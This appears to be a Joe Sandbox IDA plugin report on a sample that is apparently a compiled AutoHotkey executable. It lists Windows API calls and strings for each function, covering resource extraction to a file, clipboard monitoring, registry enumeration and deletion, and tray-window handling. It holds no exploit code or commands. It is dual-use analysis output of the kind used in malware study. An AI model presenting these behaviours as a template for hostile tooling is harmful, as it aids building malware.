Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00440630, Relevance: 12.1, APIs: 8, Instructions: 148
file

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32(00000000), ref: 004407A4

Part of subcall function 00452490: GetFileAttributesA.KERNELBASE(004987E9), ref: 004524B5
Part of subcall function 00452490: FindFirstFileA.KERNEL32(004987E9,00000000), ref: 004524CD
Part of subcall function 00452490: FindClose.KERNEL32(00000000), ref: 004524E2

CreateFileA.KERNEL32(004987E9,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004406D6
__mbsupr.LIBCMT ref: 0044074A
FindResourceA.KERNEL32(00000000,?,0000000A), ref: 0044075B
LoadResource.KERNEL32(00000000,00000000), ref: 0044076A
LockResource.KERNEL32(00000000), ref: 00440775
SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 0044078B
WriteFile.KERNEL32(00000000,00000000,00000000), ref: 00440794

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00452490, Relevance: 4.5, APIs: 3, Instructions: 33

APIs

GetFileAttributesA.KERNELBASE(004987E9), ref: 004524B5
FindFirstFileA.KERNEL32(004987E9,00000000), ref: 004524CD
FindClose.KERNEL32(00000000), ref: 004524E2

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0048D652, Relevance: 1.5, APIs: 1, Instructions: 4

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0008D610), ref: 0048D657

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00438550, Relevance: 81.4, APIs: 45, Strings: 1, Instructions: 861windowtimeclipboard

APIs

RegisterClipboardFormatA.USER32(TaskbarCreated), ref: 00438571
SetFocus.USER32(000801CA), ref: 004386BA

Part of subcall function 0046A070: GetIconInfo.USER32(?,?), ref: 0046A0BE
Part of subcall function 0046A070: GetObjectA.GDI32(?,00000018,?), ref: 0046A0D4
Part of subcall function 0046A070: DeleteObject.GDI32(?), ref: 0046A0FC
Part of subcall function 0046A070: DeleteObject.GDI32(?), ref: 0046A103

Part of subcall function 0046A120: DrawIconEx.USER32(?,?,?,?,00000000,00000000,00000000,00000000,00000003), ref: 0046A17F

Part of subcall function 00439040: PostMessageA.USER32(?,00000402,?,?), ref: 004391FE

ShowWindow.USER32(000601DA,00000000), ref: 004387CA
MoveWindow.USER32(000801CA,00000000,00000000,?,?,00000001), ref: 004387F2
GetSysColor.USER32(0000000F), ref: 004388C7
SetBkColor.GDI32(?,?), ref: 004388CF
SetTextColor.GDI32(?,?), ref: 004388E1
GetSysColorBrush.USER32(0000000F), ref: 004388FB
CreateCompatibleDC.GDI32(?), ref: 00438934
SelectObject.GDI32(00000000,?), ref: 00438941
BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 00438966
SelectObject.GDI32(00000000,?), ref: 00438972
DeleteDC.GDI32(00000000), ref: 00438979
DrawIconEx.USER32(?,?,?,?,?,?,00000000,00000000,00000003), ref: 00438999
ExcludeClipRect.GDI32(?,?,?,?,?), ref: 004389B1
CreateRectRgn.GDI32(00000000,00000000,00000001,00000001), ref: 004389BF
GetClipRgn.GDI32(?,00000000), ref: 004389C9
GetSysColorBrush.USER32(0000000F), ref: 004389DC
FillRgn.GDI32(?,00000000,00000000), ref: 004389E5
DeleteObject.GDI32(00000000), ref: 004389EC
GetClipBox.GDI32(?,00000000), ref: 00438A10
FillRect.USER32(?,?,?), ref: 00438A20
GetClientRect.USER32(?,?), ref: 00438A5B
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00438AB4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00438AD2
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00438AF5
InvalidateRect.USER32(?,?,00000001), ref: 00438B06
ShowWindow.USER32(000601DA,00000000), ref: 00438B6E
GetMenu.USER32(000601DA), ref: 00438B9A
CheckMenuItem.USER32(00000000), ref: 00438BA1

Part of subcall function 00415670: _strncpy.LIBCMT ref: 004156F2
Part of subcall function 00415670: Shell_NotifyIcon.SHELL32 ref: 00415701

Part of subcall function 00415720: LoadImageA.USER32(00400000,?,00000001,00000000,00000000,00008000), ref: 004157DB
Part of subcall function 00415720: Shell_NotifyIcon.SHELL32(00000001,004AC10A), ref: 004157F0

DefWindowProcA.USER32(?,?,?,?), ref: 00438C00
SendMessageTimeoutA.USER32(00000000,0000030D,?,?,00000002,000007D0,?), ref: 00438C4F
PostMessageA.USER32(00000000,?,?,?), ref: 00438C81

Part of subcall function 00403690: GetTickCount.KERNEL32(0040171F), ref: 004036C2

PostMessageA.USER32(000601DA,00000415,00000000,00000000), ref: 00438CD0
SendMessageTimeoutA.USER32(00000000,?,?,?,00000002,000007D0,?), ref: 00438CF2

Part of subcall function 00469B70: CheckMenuItem.USER32(?,0000FF19,?), ref: 00469BCB
Part of subcall function 00469B70: CheckMenuItem.USER32(?,0000FF1A,?), ref: 00469BEB
Part of subcall function 00469B70: GetCursorPos.USER32(?), ref: 00469C06
Part of subcall function 00469B70: GetForegroundWindow.USER32 ref: 00469C52
Part of subcall function 00469B70: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00469C67
Part of subcall function 00469B70: SetForegroundWindow.USER32(000601DA), ref: 00469C82
Part of subcall function 00469B70: SetForegroundWindow.USER32(000601DA), ref: 00469CA9
Part of subcall function 00469B70: TrackPopupMenuEx.USER32(?,00000000,?,?,000601DA,00000000), ref: 00469CCE
Part of subcall function 00469B70: PostMessageA.USER32(000601DA,00000000,00000000,00000000), ref: 00469CF3
Part of subcall function 00469B70: GetForegroundWindow.USER32 ref: 00469D03
Part of subcall function 00469B70: SetForegroundWindow.USER32(00000000), ref: 00469D12

Part of subcall function 0042A650: _strncpy.LIBCMT ref: 0042A6C6
Part of subcall function 0042A650: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,00000000,00000064), ref: 0042A724
Part of subcall function 0042A650: GetTickCount.KERNEL32(00000000,00000064), ref: 0042A780
Part of subcall function 0042A650: GetTickCount.KERNEL32(00000000,00000064), ref: 0042A7CC
Part of subcall function 0042A650: GetTickCount.KERNEL32 ref: 0042A806

PostMessageA.USER32(?,00000402,?,00000001), ref: 00438D79
GetCurrentProcessId.KERNEL32 ref: 00438EC4

Part of subcall function 004392C0: SendMessageA.USER32(000801CA,0000000C,00000000,Script info will not be shown because the "Menu, Tray, MainWindow"command option was not enabled in the original script.), ref: 0043931A
Part of subcall function 004392C0: SendMessageA.USER32(000801CA,0000000C,00000000,?), ref: 004393D2
Part of subcall function 004392C0: IsWindowVisible.USER32(000601DA), ref: 004393DA
Part of subcall function 004392C0: ShowWindow.USER32(000601DA,00000005), ref: 004393F3
Part of subcall function 004392C0: IsIconic.USER32(000601DA), ref: 004393FC
Part of subcall function 004392C0: ShowWindow.USER32(000601DA,00000009), ref: 0043940E
Part of subcall function 004392C0: GetForegroundWindow.USER32 ref: 00439410
Part of subcall function 004392C0: SetForegroundWindow.USER32(000601DA), ref: 00439421
Part of subcall function 004392C0: SendMessageA.USER32(000801CA,000000B6,00000000,000F423F), ref: 0043944C

GlobalUnWire.KERNEL32(00000000), ref: 00438DC7
CloseClipboard.USER32 ref: 00438DD3
GetCurrentProcessId.KERNEL32 ref: 00438DE5
EnumWindows.USER32(00476430,?), ref: 00438DFD

Part of subcall function 00475520: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0047553B
Part of subcall function 00475520: GetForegroundWindow.USER32 ref: 0047555A
Part of subcall function 00475520: FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0047556C
Part of subcall function 00475520: IsIconic.USER32(00000000), ref: 00475583
Part of subcall function 00475520: ShowWindow.USER32(00000000,00000009), ref: 00475590
Part of subcall function 00475520: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004755C1
Part of subcall function 00475520: AttachThreadInput.USER32(00000E10,00000000,00000001), ref: 004755E7
Part of subcall function 00475520: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00475600
Part of subcall function 00475520: SetForegroundWindow.USER32(00000000), ref: 00475621
Part of subcall function 00475520: GetForegroundWindow.USER32 ref: 00475643
Part of subcall function 00475520: GetWindow.USER32(00000000,00000004), ref: 0047565A
Part of subcall function 00475520: AttachThreadInput.USER32(00000E10,?,00000000), ref: 004756BE
Part of subcall function 00475520: AttachThreadInput.USER32(?,?,00000000), ref: 004756D7
Part of subcall function 00475520: BringWindowToTop.USER32(00000000), ref: 004756E2

PostMessageA.USER32(?,?,?,?), ref: 00438E4E
SetTimer.USER32(?,00000000,?,004036F0), ref: 00438E33

Part of subcall function 00415A90: MessageBoxA.USER32(000601DA,?,001B2734,00010000), ref: 00415AF2
Part of subcall function 00415A90: IsWindow.USER32(000601DA), ref: 00415AFE
Part of subcall function 00415A90: DestroyWindow.USER32(000601DA), ref: 00415B16
Part of subcall function 00415A90: _strncpy.LIBCMT ref: 00415B90
Part of subcall function 00415A90: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,00000000,004A8ED0,001BC918,00000000), ref: 00415BE9

IsWindow.USER32(?), ref: 00438EA5
GetWindowTextA.USER32(?,?,00000064), ref: 00438EB3

Strings

TaskbarCreated, xrefs: 0043856C

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00415240, Relevance: 56.2, APIs: 22, Strings: 10, Instructions: 248
windowregistry

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32(00000031), ref: 004152B0
LoadCursorA.USER32(00000000,00007F00), ref: 004152E0
RegisterClassExA.USER32 ref: 00415305
RegisterClassExA.USER32(?), ref: 0041534A
GetForegroundWindow.USER32 ref: 00415351
GetClassNameA.USER32(00000000,?,00000040), ref: 00415363
CreateWindowExA.USER32(00000001,AutoHotkey,?,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00400000,00000000), ref: 004153D6
GetMenu.USER32(00000000), ref: 0041540B
EnableMenuItem.USER32(00000000,0000FF79,00000003), ref: 0041541B

Part of subcall function 00415640: EnableMenuItem.USER32(00000000,0000FF81,00000003), ref: 0041564E
Part of subcall function 00415640: EnableMenuItem.USER32(00000000,0000FF7E,00000003), ref: 00415657
Part of subcall function 00415640: EnableMenuItem.USER32(00000000,0000FF7F,00000003), ref: 00415660
Part of subcall function 00415640: EnableMenuItem.USER32(00000000,0000FF80,00000003), ref: 00415669

CreateWindowExA.USER32(00000000,edit,00000000,50A00804,00000000,00000000,00000000,00000000,000601DA,00000001,00400000,00000000), ref: 00415453
GetDC.USER32(00000000), ref: 0041545F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00415499
MulDiv.KERNEL32(0000000A,00000000), ref: 004154A2
CreateFontA.GDI32(00000000), ref: 004154AB
ReleaseDC.USER32(000801CA,00000000), ref: 004154BD
SendMessageA.USER32(000801CA,00000030,3C0A0928,00000000), ref: 004154DB
SendMessageA.USER32(000801CA,000000C5,00000000,00000000), ref: 004154EC
ShowWindow.USER32(000601DA,00000000), ref: 004154FD
ShowWindow.USER32(000601DA,00000000), ref: 00415508
ShowWindow.USER32(000601DA,00000006), ref: 00415519
SetWindowLongA.USER32(000601DA,000000EC,00000000), ref: 00415526
LoadAcceleratorsA.USER32(00400000,000000D4), ref: 00415538

Part of subcall function 00415670: _strncpy.LIBCMT ref: 004156F2
Part of subcall function 00415670: Shell_NotifyIcon.SHELL32 ref: 00415701

Part of subcall function 00415590: PostMessageA.USER32(000601DA,00000415,00000001,00000000), ref: 004155D4
Part of subcall function 00415590: SetClipboardViewer.USER32(000601DA), ref: 004155E7
Part of subcall function 00415590: ChangeClipboardChain.USER32(000601DA,?), ref: 00415629

Part of subcall function 004736A0: LoadLibraryExA.KERNEL32(?,00000000,00000002,?,761980C8,?,00000000,0000002C,004A8ED0,761980C8,00000000), ref: 004736BD
Part of subcall function 004736A0: EnumResourceNamesA.KERNEL32(00400000,0000000E,00473670,?), ref: 00473702
Part of subcall function 004736A0: FindResourceA.KERNEL32(00400000,?,0000000E), ref: 00473710
Part of subcall function 004736A0: LoadResource.KERNEL32(00400000,00000000,?,00000000,0000002C,004A8ED0,761980C8,00000000), ref: 00473720
Part of subcall function 004736A0: LockResource.KERNEL32(00000000,?,00000000,0000002C,004A8ED0,761980C8,00000000), ref: 0047372F
Part of subcall function 004736A0: GetSystemMetrics.USER32(0000000B), ref: 00473757
Part of subcall function 004736A0: FindResourceA.KERNEL32(00400000,?,00000003), ref: 004737AF
Part of subcall function 004736A0: LoadResource.KERNEL32(00400000,00000000), ref: 004737BD
Part of subcall function 004736A0: LockResource.KERNEL32(00000000), ref: 004737C8
Part of subcall function 004736A0: SizeofResource.KERNEL32(00400000,00000000,00000001,00030000,00000000,00000000,00000000), ref: 004737E3
Part of subcall function 004736A0: CreateIconFromResourceEx.USER32(00000000,00000000), ref: 004737EB
Part of subcall function 004736A0: FreeLibrary.KERNEL32(00400000,?,00000000,0000002C,004A8ED0,761980C8,00000000), ref: 00473800
Part of subcall function 004736A0: ExtractIconA.SHELL32(00000000,?,?), ref: 00473818
Part of subcall function 004736A0: ExtractIconA.SHELL32(00000000,?,-00000001), ref: 00473834

Strings

RegClass, xrefs: 0041531D
0, xrefs: 00415283
edit, xrefs: 0041544C
CreateWindow, xrefs: 004153F2
Lucida Console, xrefs: 00415470
(<, xrefs: 004154B1, 004154C3
Consolas, xrefs: 00415477
AutoHotkey, xrefs: 0041528B, 004153CB
Shell_TrayWnd, xrefs: 00415371
AutoHotkey2, xrefs: 0041533A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004280CD, Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 299registrytimelibrary

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 0042814F
GetLastError.KERNEL32 ref: 004281DF

Part of subcall function 0046EBF0: RegEnumKeyExA.ADVAPI32 ref: 0046EC27
Part of subcall function 0046EBF0: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,?,?), ref: 0046EC5A
Part of subcall function 0046EBF0: RegCloseKey.ADVAPI32(00000000,00000000), ref: 0046EC76
Part of subcall function 0046EBF0: RegDeleteKeyA.ADVAPI32(?,?), ref: 0046EC86
Part of subcall function 0046EBF0: RegEnumKeyExA.ADVAPI32 ref: 0046ECAE

RegCloseKey.ADVAPI32(?), ref: 00428179
GetModuleHandleA.KERNEL32(advapi32,RegDeleteKeyExA), ref: 0042819D
GetProcAddress.KERNEL32(00000000), ref: 004281A4
RegDeleteKeyA.ADVAPI32(?,?), ref: 004281F0

Part of subcall function 00413770: _strncpy.LIBCMT ref: 00413989
Part of subcall function 00413770: RegConnectRegistryA.ADVAPI32(?), ref: 004139AB

Part of subcall function 0046ECE0: RegOpenKeyExA.ADVAPI32(00000000,?,00000000,?,?,?,?,?,004282B1,?,004987E9), ref: 0046ED1C
Part of subcall function 0046ECE0: RegCloseKey.ADVAPI32(?,004987E9), ref: 0046ED44
Part of subcall function 0046ECE0: GetModuleHandleA.KERNEL32(advapi32,RegDeleteKeyExA), ref: 0046ED6B
Part of subcall function 0046ECE0: GetProcAddress.KERNEL32(00000000), ref: 0046ED72
Part of subcall function 0046ECE0: GetLastError.KERNEL32(?,?,?,004282B1,?,004987E9), ref: 0046EDA6
Part of subcall function 0046ECE0: RegDeleteKeyA.ADVAPI32(00000000,?), ref: 0046EDB0
Part of subcall function 0046ECE0: RegDeleteValueA.ADVAPI32(?,?,?,?,?,004282B1,?,004987E9), ref: 0046EDBA
Part of subcall function 0046ECE0: RegCloseKey.ADVAPI32(?,?,?,?,004282B1,?,004987E9), ref: 0046EDC7

RegCloseKey.ADVAPI32(00000000), ref: 004282BF

Part of subcall function 004719A0: _vswprintf_s.LIBCMT ref: 004719B9

Strings

advapi32, xrefs: 00428198
%s\%s, xrefs: 004280F4
RegDeleteKeyExA, xrefs: 00428193
ahk_default, xrefs: 0042828C

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0048C8C2, Relevance: 28.5, APIs: 15, Strings: 1, Instructions: 494
file

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 0048C9B4

Part of subcall function 00488A22: __amsg_exit.LIBCMT ref: 00488A32

GetConsoleMode.KERNEL32(00000000,?), ref: 0048C9D2
GetConsoleCP.KERNEL32 ref: 0048C9F2

Part of subcall function 0048B715: __isleadbyte_l.LIBCMT ref: 0048B71F

__Stoull.NTSTC_LIBCMT ref: 0048CA8C
__Stoull.NTSTC_LIBCMT ref: 0048CAB0
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00484D53,00000005,00000000,00000000), ref: 0048CAE2
WriteFile.KERNEL32(00000000,00484D53,00000000,?,00000000), ref: 0048CB0B
WriteFile.KERNEL32(00000000,00484D53,00000001,?,00000000), ref: 0048CB64

Part of subcall function 00490DF7: ___initconout.LIBCMT ref: 00490E06
Part of subcall function 00490DF7: WriteConsoleW.KERNEL32(FFFFFFFE,00000000,00000001,?,00000000), ref: 00490E29

WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0048CCD2
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0048CDAC
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 0048CE7C
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0048CEAD
GetLastError.KERNEL32 ref: 0048CEC3
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0048CF04
GetLastError.KERNEL32(?,?,00484D53,00000000,?,?,004011C4,00000001,001BC8A4), ref: 0048CF23

Part of subcall function 0048B884: IsDebuggerPresent.KERNEL32 ref: 00490272
Part of subcall function 0048B884: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00490287
Part of subcall function 0048B884: UnhandledExceptionFilter.KERNEL32(004987AC), ref: 00490292
Part of subcall function 0048B884: GetCurrentProcess.KERNEL32(C0000409), ref: 004902AE
Part of subcall function 0048B884: TerminateProcess.KERNEL32(00000000), ref: 004902B5

Part of subcall function 0048E62D: SetFilePointer.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0048C995,00000000,00000000,00000000,00000002,00000000,00000001), ref: 0048E66F
Part of subcall function 0048E62D: GetLastError.KERNEL32(?,0048C995,00000000,00000000,00000000,00000002,00000000,00000001,00000000,SMH,0048D054,00000000,00000108,?,004A18E0,00000010), ref: 0048E67C

Strings

SMH, xrefs: 0048C8C4

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0042456F, Relevance: 19.8, APIs: 7, Strings: 4, Instructions: 569timeregistry

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

Part of subcall function 0042A8A0: GetTickCount.KERNEL32(00000003,?,?,?,?,?,00000001,00424817,?,?,?,00000000,00000000,00000000,00000001), ref: 0042A968

Part of subcall function 0042AA60: GetTickCount.KERNEL32 ref: 0042AB6E

Part of subcall function 0042BD50: _strncpy.LIBCMT ref: 0042BDF3

Part of subcall function 0042BAA0: _strncpy.LIBCMT ref: 0042BB42
Part of subcall function 0042BAA0: _strncpy.LIBCMT ref: 0042BB64

Part of subcall function 004147A0: GetCPInfo.KERNEL32(000004E4,?), ref: 004147D1

Part of subcall function 004147F0: CloseHandle.KERNEL32(?), ref: 00414858

Part of subcall function 0046F550: GetCPInfo.KERNEL32(0000FDE9,?,?,004162E2,0000000C), ref: 0046F595
Part of subcall function 0046F550: GetCPInfo.KERNEL32(0000FDE9,?,?,004162E2,0000000C), ref: 0046F62F

Part of subcall function 0042C010: _strncpy.LIBCMT ref: 0042C045

Part of subcall function 0042B090: _strncpy.LIBCMT ref: 0042B0B3
Part of subcall function 0042B090: FindFirstFileA.KERNEL32(?,?,?,0000005C,?,?,?), ref: 0042B146
Part of subcall function 0042B090: FindNextFileA.KERNEL32(00000000,00000010), ref: 0042B1CA
Part of subcall function 0042B090: FindClose.KERNEL32(?,00000003,?,?,?,?,?), ref: 0042B291
Part of subcall function 0042B090: GetTickCount.KERNEL32(00000003,?,?,?,?,?), ref: 0042B2DE
Part of subcall function 0042B090: FindNextFileA.KERNEL32(?,?,00000003,?,?,?,?,?), ref: 0042B3CA
Part of subcall function 0042B090: FindClose.KERNEL32(?,?,?,?), ref: 0042B47C
Part of subcall function 0042B090: FindFirstFileA.KERNEL32(?,?), ref: 0042B4BA
Part of subcall function 0042B090: FindNextFileA.KERNEL32(?,00000010), ref: 0042B5A2
Part of subcall function 0042B090: FindClose.KERNEL32(?), ref: 0042B5B5
Part of subcall function 0042B090: FindClose.KERNEL32(?,?,00000000,000000FF,00000000,00000003,?,?,?,?,?), ref: 0042B5E9
Part of subcall function 0042B090: FindClose.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0042B603

Part of subcall function 00413770: _strncpy.LIBCMT ref: 00413989
Part of subcall function 00413770: RegConnectRegistryA.ADVAPI32(?), ref: 004139AB

Part of subcall function 0042B620: _strncpy.LIBCMT ref: 0042B667
Part of subcall function 0042B620: RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 0042B6B9
Part of subcall function 0042B620: RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0042B6E4
Part of subcall function 0042B620: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0042B76B
Part of subcall function 0042B620: RegCloseKey.ADVAPI32(?,00000003,?,?), ref: 0042B7E1
Part of subcall function 0042B620: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?), ref: 0042B84B
Part of subcall function 0042B620: RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,?), ref: 0042B8BD
Part of subcall function 0042B620: RegCloseKey.ADVAPI32(?,00000003,?,?), ref: 0042B945
Part of subcall function 0042B620: RegCloseKey.ADVAPI32(?,00000003,?,?), ref: 0042BA68
Part of subcall function 0042B620: RegCloseKey.ADVAPI32(?), ref: 0042BA82

RegCloseKey.ADVAPI32(?), ref: 00424A13
GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
